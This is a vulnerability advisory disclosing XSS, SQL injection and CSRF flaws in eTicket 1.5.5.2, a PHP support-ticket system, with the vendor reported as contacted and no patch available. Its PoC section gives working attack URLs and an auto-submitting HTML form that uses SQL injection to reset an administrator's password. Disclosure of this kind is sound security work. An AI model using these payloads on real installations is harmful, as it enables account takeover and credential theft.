====================================================================== eTicket 1.5.5.2 Multiple Vulnerabilities ====================================================================== Author: L4teral <l4teral [4t] gmail com> Impact: Cross Site Scripting Cross Site Request Forgery SQL Injection Status: patch not available ------------------------------ Affected software description: ------------------------------ Application: eTicket Version: 1.5.5.2 (other versions may also be affected) Vendor: http://eticket.sourceforge.net Description: eTicket is a PHP-based electronic (open source) support ticket system based on osTicket, that can receive tickets via email (pop3/pipe) or a web form. It also offers a ticket manager with many features. An ideal helpdesk solution for any website. -------------- Vulnerability: -------------- 1. The variable 's' is not properly sanitized leading to cross site scripting. 2. The script admin.php is prone to sql injections (admin privileges required). 3. The search of the application is prone to sql injection, which can be used to obtain login credentials or perform other malicious taks. The parameters 'status', 'sort' and 'way' are not properly sanitized before being used in a sql query. Exploitation requires valid user credentials, but as any user is able to create a ticket, an attacker can obtain valid login data without any problems. 4. The application is vulnerable to cross site request forgery. Combined with the "my account" part of the application being prone to sql injection, the password of an admin account can be set to an arbitrary value by just visiting a specially crafted website wile being logged in to the application. Normally, the current password has to be entered to change the password of an account. This can be circumvented in the described way by combining the two vulnerabilities. ------------ PoC/Exploit: ------------ 1. http://localhost/eTicket/view.php?s="><script>alert(document.cookie)</sc ript> 2. http://localhost/eTicket/admin.php?a=headers&msg=SQL' 3. http://localhost/eTicket/search.php?s=advanced&text=test&cat=&status=ope n'SQL&search_submit=Search 4. By visiting a page containing the following code, the password of a logged in administrator will be set to "hacked". <html> <body> <form id="csrf" name="csrf" action="http://localhost/eTicket/admin.php?a=my" method="post"> <input type="hidden" name="a" value="my"> <input type="text" name="username" value="admin"><br> <input type="text" name="name" value="admin"><br> <input type="text" name="email" value="mail (at) example (dot) org [email concealed]"><br> <input type="password" name="password" value="') OR ('1'='1"><br> <input type="password" name="npassword" value="hacked"><br> <input type="password" name="vpassword" value="hacked"><br> <textarea name="sig" cols="30" rows="5"></textarea><br> <input type="submit" name="submit" value="Save Changes"><br> </form> <script language="JavaScript">document.getElementById('csrf').submit.click()</sc ript> </body> </html> --------- Timeline: --------- 2007-11-19 - vendor informed The vendor responded, but after multiple attempts i did not get a statement whether these vulnerabilities will get fixed in a new version.